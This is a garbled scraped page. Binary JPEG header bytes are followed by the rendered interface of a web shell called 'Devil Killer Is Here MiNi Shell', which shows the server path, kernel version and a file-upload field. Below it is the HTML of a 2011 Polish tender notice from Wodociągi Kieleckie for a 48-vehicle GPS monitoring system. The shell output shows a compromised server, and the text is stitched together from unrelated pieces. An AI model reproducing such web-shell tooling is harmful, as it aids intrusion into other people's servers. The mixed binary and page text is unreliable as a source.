JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111025/279271-N-2011.html

<p class="kh_header"><b>Kielce: Dostawa i montaż  urządzeń oraz wdrożenie kompletnego systemu  umożliwiającego monitorowanie i lokalizowanie 48  pojazdów  Wodociągów Kieleckich Sp. z o.o. w Kielcach wraz z dwuletnią obsługą systemu</b><br>
<b>Numer ogłoszenia: 279271 - 2011; data zamieszczenia: 25.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Kieleckie Sp. z o.o. , ul. Krakowska 64, 25-701 Kielce, woj. świętokrzyskie, tel. 041 3653100, faks 041 3455220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wod-kiel.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż  urządzeń oraz wdrożenie kompletnego systemu  umożliwiającego monitorowanie i lokalizowanie 48  pojazdów  Wodociągów Kieleckich Sp. z o.o. w Kielcach wraz z dwuletnią obsługą systemu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest    dostawa i montaż  urządzeń oraz wdrożenie kompletnego systemu umożliwiającego monitorowanie i lokalizowanie 48 pojazdów Wodociągów Kieleckich Sp. z o.o. w Kielcach wraz z dwuletnią obsługą systemu

1. Zamówienie obejmuje:

1.1.System składający się z następujących urządzeń :
a. Sterowników pojazdowych wyposażonych w odbiorniki GPS i modemy GSM 
z funkcją pakietowej transmisji danych GPRS do realizacji monitoringu pojazdów w czasie rzeczywistym. Urządzenia powinny mieć możliwość buforowania danych 
w przypadku braku łączności z siecią GSM (po ponownym nawiązaniu komunikacji ma zapewnić przesłanie zgromadzonych danych do systemu monitoringu). Urządzenia mają być wolne od zabezpieczeń operatorów sieci komórkowych (SIM-lock). Powinny również posiadać niezbędną ilość wejść binarnych i analogowych do realizacji zadań wyspecyfikowanych w załączniku 
nr 5 do SIWZ. Błąd lokalizacji odbiorników GPS nie może przekraczać 5 m. Urządzenia powinny posiadać mechanizm zabezpieczający przed rozładowaniem akumulatora pojazdu, sygnalizować próbę nieautoryzowanej ingerencji w instalację systemu GPS. Sterownik powinien posiadać również możliwość podłączenia zewnętrznej anteny GPS oraz GSM;
b. Urządzenia do cyfrowej identyfikacji kierowcy wraz z identyfikatorami; Zamawiający zgłasza do identyfikacji 111 kierowców. 
c. Sondy do pomiaru paliwa w zbiorniku pojazdu ( pojazdy wymienione 
w załączniku nr 5 SIWZ). Urządzenie musi posiadać ważną homologację wydaną przez Ministerstwo Transportu. Dopuszczalna rozbieżność pomiarowa sondy paliwowej nie może przekraczać 3% w odniesieniu do wielkości zbiornika.
d. Urządzenia towarzyszące niezbędne do prawidłowego realizowania zadań wymienionych w pkt. 2 poniżej oraz zapewniające monitorowanie stanów pojazdów wymienionych w załączniku nr 5 do SIWZ.
e. Urządzenia umożliwiającego pozyskanie informacji o wypadku pojazdu.

Urządzenia będą zasilane z instalacji elektrycznej pojazdu (napięcie zasilania 8-30 VDC). Urządzenia  muszą  posiadać deklarację  zgodności CE,  potwierdzenie zgodności
z wymaganiami zasadniczymi w zakresie:
- efektywnego wykorzystania zasobów częstotliwości - art. 3.2 dyrektywy 1999/5/WE z dnia 9 marca 1999 r w sprawie urządzeń radiowych i końcowych 
       urządzeń telekomunikacyjnych oraz wzajemnego uznawania ich zgodności
      (Dz.Urz. WE 91 z 07.04.1999  str.10 in.)   
- kompatybilności elektromagnetycznej (EMC) - art. 3.1b dyrektywy 1999/5/WE
- bezpieczeństwa użytkowania - art. 3.1a dyrektywy 1999/5/WE
 dopuszczające do używania na terenie Unii Europejskiej. 
Urządzenia niezbędne do prawidłowej pracy systemu nie mogą wpływać na pogorszenie eksploatacji pojazdów i nie mogą powodować utraty gwarancji pojazdów.

W przypadku pojazdów na gwarancji, montaż urządzeń należy uzgodnić z Gwarantem. 
Na dzień ogłoszenia przetargu Zamawiający posiada  2 pojazdy na gwarancji, z czego 1 
marki : Volkswagen dostawczy TK 88136 i  1  koparko-ładowarka JCB  11-13. 
Zamawiający nie przewiduje zmian ilości posiadanych pojazdów do dnia składania ofert.

1.2. System monitoringu zainstalowany na serwerze Wykonawcy, który musi umożliwiać całodobowy dostęp do danych, ich wizualizację (graficzną, tabelaryczną),  archiwizację i dostęp do danych z okresu min. 24 miesięcy wstecz. Dostęp do danych musi być realizowany  przez dowolną przeglądarkę internetową  i musi być ograniczony indywidualnym loginem i hasłem użytkownika.
Dodatkowo system powinien posiadać następujące moduły:
a. Moduł ewidencji pojazdów i kierowców uwzględniający:
a. dentyfikację kierowców,
b. dane pojazdu (marka,typ,model, numer rejestracyjny, rodzaj paliwa, pojemność skokowa silnika, pojemność zbiornika paliwa, stan licznika (możliwość korekty w dowolnym momencie), termin następnego badania technicznego itp.).
System musi zapewniać rejestrację i ewidencję danych związanych 
z pracownikami zatrudnionymi na stanowiskach kierowców niezbędnych dla prawidłowego funkcjonowania monitoringu, posiadać mechanizm umożliwiający ewidencję i rozliczanie czasu pracy (w tym pokonanych dystansów). Efektem zastosowanego mechanizmu musi być możliwość generowania raportów o czasie pracy i ilości kilometrów pokonanych przez każdego kierowcę. W kartotece kierowcy musi być możliwość definiowania czasów pracy w układzie dnia lub innego dowolnie zdefiniowanego okresu.
b.Moduł rejestracji i monitoringu uwzględniający:
- aktualną pozycję pojazdu (pozycjonowanie co 1 minutę, co 300m lub przez zmianę kierunku jazdy),
- trasę przejazdów,
- prędkość pojazdów,
- poziom paliwa w zbiorniku,
- czas i miejsce postoju,
- pracę opomiarowanych urządzeń (zgodnie z załącznikiem nr5 do SIWZ)
- sygnały z dodatkowych urządzeń, czujników zainstalowanych na pojeździe (zgodnie z załącznikiem nr 5 do SIWZ),
- moduł wprowadzania dodatkowych danych użytkownika dotyczących pojazdów, kierowców (np. nr zlecenia przypisanego do trasy, ilość tankowanego paliwa, datę tankowania),
- moduł raportowania - możliwość generowania dowolnych raportów w postaci tabelarycznej i graficznej; dowolna możliwość agregowania i filtrowania danych z wszystkich gromadzonych w systemie danych,
- moduł eksportu kompletnej bazy danych w formacie zgodnym z typem SQL open source (wykonanie kopii całej bazy znajdującej się na serwerze świadczącego usługę monitoringu i możliwość zapisania na nośniku Zamawiającego na jego życzenie).
Wykonawca dostarczy Zamawiającemu strukturę wyeksportowanej bazy.
- moduł mapowy - mapa musi umożliwiać szybką i elastyczną wizualizację informacji bieżących i archiwalnych gromadzonych przez urządzenia rejestrujące w pojazdach, musi umożliwiać płynne przewijanie poszczególnych obszarów mapy oraz dynamiczne wyświetlanie informacji, określać lokalizację (pozycji geograficznej) z maksymalnym błędem nie przekraczającym 5 m, zasięgiem musi obejmować obszar Polski i być wyposażona w szczegółowe plany miasta Kielce, gminy Masłów, gminy Sitkówka-Nowiny oraz gminy Zagnańsk w tym musi zawierać wszystkie nazwy ulic na terenie tych obszarów.
Mapa musi być aktualizowana nie rzadziej niż co 6 miesięcy. 

Dodatkowo mapa musi charakteryzować się, co najmniej następującymi parametrami:

- prezentacja sieci ulic i zabudowy,
- prezentacja sieci kolejowej,
- prezentacja obszarów zieleni (trawniki, parki, lasy itd.),
- prezentacja obszarów wodnych (rzeki, jeziora, sztuczne zbiorniki),
 c. Moduł informowania o wypadku

Szczegółową specyfikację urządzeń oraz monitorowanych parametrów zawiera załącznik nr 5 do SIWZ. 

2.Wymagania dodatkowe dla systemu monitoringu:
a. interfejs w całości w języku polskim, wszystkie komunikaty i pliki pomocy,
b. możliwość definiowania zakresu dostępowego dla poszczególnych użytkowników,
c. możliwość śledzenia tych samych, bądź całkiem różnych chwilowych parametrów pojazdów na wielu stanowiskach w tym samym czasie z wykorzystaniem interfejsu graficznego i z funkcjonalnością zdefiniowaną oddzielnie dla każdego operatora,
d. dostęp do systemu dla min. 20 użytkowników, w tym dostęp do systemu dla  10 użytkowników jednocześnie; uprawnienia do dostępu do systemu nadaje kierownik Zamawiającego, 
e. tworzenie profili dostępowych dostosowujących dostęp do zasobu pod kątem przyporządkowania samochodów do poszczególnych działów i komórek, organizacyjnych odwzorowanych w strukturze Zamawiającego tak, by użytkownicy pomiędzy Działami nie mieli dostępu do zasobów Systemu wykraczających poza ich zakres pracy,
f. dostęp do sytemu musi być chroniony przez układ imiennej identyfikacji użytkownika,
g. możliwość dostosowania wyglądu i funkcjonalności systemu do potrzeb Zamawiającego,
h)	możliwość integracji z własnym systemem informatycznym Zamawiającego za pomocą API (Application Programming Interface).

3. Wymagania Zamawiającego związane z realizacją przedmiotu zamówienia: 

a. Wykonawca powinien zaproponować takie rozwiązanie systemu monitoringu który daje w każdej chwili możliwość przejęcia całościowej obsługi i eksploatacji systemu przez Zamawiającego (przejęcie baz danych, istniejących konfiguracji, możliwość instalacji serwera aplikacji, serwera GPRS, serwera map na fizycznych serwerach Zamawiającego, po ewentualnym zakupie niezbędnych licencji). 
b. W przypadku likwidacji środka trwałego znajdującego się w wykazie pojazdów 
wprowadzonego do systemu, Wykonawca wymontuje urządzenia z danego środka transportu i zamontuje je do pojazdu wskazanego przez Zamawiającego. 
c. Wykonawca zapewni możliwość nabycia odbiornika GPRS współpracującego
z dostarczonymi sterownikami pojazdowymi oraz umożliwiającego wymianę danych między pojazdami a serwerem.
d. Wykonawca udzieli na cały przedmiot zamówienia gwarancji na okres 24 miesięcy licząc od dnia protokólarnego bezusterkowego odbioru przedmiotu zamówienia na warunkach określonych we wzorze umowy stanowiącym załącznik nr 4 do  SIWZ.   
e. Wszystkie koszty związane z realizacją dostawy, montażu i wdrożenia (koszty transportu, zamontowania, zabezpieczenia urządzeń przed uszkodzeniem podczas transportu i montażu itp.) jak również wszystkie koszty związane z przeglądami i obsługą systemu przez okres pierwszych 2 lat ponosi Wykonawca.
f. Wykonawca zapewni właściwą ochronę przetworzonych danych Zamawiającego oraz ich transmisję uwzględniając wszystkie przepisy prawa w tym zakresie, 
a  w  szczególności  ustawę o ochronie danych osobowych.  
g. Za dwuletnią obsługę systemu Wykonawca będzie otrzymywał wynagrodzenie 
           na podstawie faktur miesięcznych.  
           Wysokość opłaty miesięcznej  stanowi 1/24 ceny netto za dwuletnią  obsługę   systemu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa 
     w art. 67 ust. 1 pkt. 7 ustawy  Prawo zamówień publicznych</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.11.21.00-4, 72.31.00.00-1, 32.53.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 26.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca obowiązany jest wnieść wadium w wysokości 3 600 PLN. (słownie: trzy tysiące sześćset PLN) przed upływem terminu składania ofert. 
2.Wadium obejmuje okres związania  ofertą. 
3.  Formy wniesienia, zwrot i zatrzymanie wadium odbywa się na zasadach określonych  w ustawie 
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy.    Zamawiający wskazuje do wpłaty wadium rachunek bankowy nr:
79 1030 1162 0000 0000 0508 0201.
5. Oryginał dokumentu świadczącego o wniesieniu  wadium w formie niepieniężnej należy złożyć w w Biurze Obsługi Klienta Spółki Wodociągi Kieleckie w Kielcach, ul.Krakowska 64   przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń. Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuje formułę spełnia/nie spełnia. Nie spełnienie warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń. Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuje formułę spełnia/nie spełnia. Nie spełnienie warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń. Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuje formułę spełnia/nie spełnia. Nie spełnienie warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń. Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuje formułę spełnia/nie spełnia. Nie spełnienie warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń. Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuje formułę spełnia/nie spełnia. Nie spełnienie warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku Wykonawców wspólnie ubiegających się o zamówienie, dokument potwierdzający
 ustanowienie pełnomocnika do reprezentowania w postępowaniu i zawarciu umowy.
- W przypadku Wykonawców wspólnie ubiegających się o zamówienie, oświadczenie o przyjęciu solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia. 
- Jeżeli Wykonawca w celu realizacji zamówienia zamierza polegać na wiedzy 
i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów - zobowiązany jest wykazać, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający może dokonać zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w szczególności w następujących przypadkach:
a) Zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego;
Zmiana wymaga zgłoszenia w formie pisemnej . Zmiana ta może spowodować wydłużenie terminu wykonania prac i poza sytuacją opisaną w punkcie b) poniżej nie spowoduje zmiany wynagrodzenia Wykonawcy  . Inicjatorem tej zmiany może być Zamawiający lub Wykonawca.

 b)  Ustawowej zmiany podatku od towarów i usług - VAT;
Inicjatorem tej zmiany może być Zamawiający lub Wykonawca. Zmiana wymaga zgłoszenia w formie pisemnej. Zmiana ta nie wpłynie na termin wykonania prac, ale może spowodować  zmianę wynagrodzenia brutto Wykonawcy przy niezmiennej kwocie netto.

c) Zmian personalnych w zakresie osób odpowiedzialnych za realizację zadania 
tj. osoby nadzorującej ze strony Wykonawcy i Zamawiającego wpisanych do umowy. 
      Inicjatorem tej zmiany może być Zamawiający lub Wykonawca. Zmiana wymaga zgłoszenia w formie pisemnej . Zmiana ta nie wpłynie na termin wykonania prac i nie spowoduje zmiany wynagrodzenia Wykonawcy.

Wystąpienie którejkolwiek z okoliczności mogącej stać się podstawą zmiany umowy  nie rodzi po stronie Zamawiającego obowiązku dokonania zmiany umowy . 

2. Zamawiający przewiduje możliwość zmniejszenia ilości jednostek transportowych 
objętych systemem. W takim przypadku cena za obsługę systemu zostanie zmniejszona o kwotę obsługi przewidzianą dla tego środka transportu.
Pomniejszenie ceny nastąpi od miesiąca następującego po miesiącu, w którym 
Zamawiający wycofał jednostkę z systemu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:/ / wod-kiel.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wodociągi  Kieleckie Sp. z o.o. Biuro Obsługi Klienta ul. Krakowska 64, 25-701 Kielce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2011 godzina 11:45, miejsce: Biuro Obsługi Klienta Wodociągów Kieleckich ul. Krakowska 64, 25-701 Kielce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





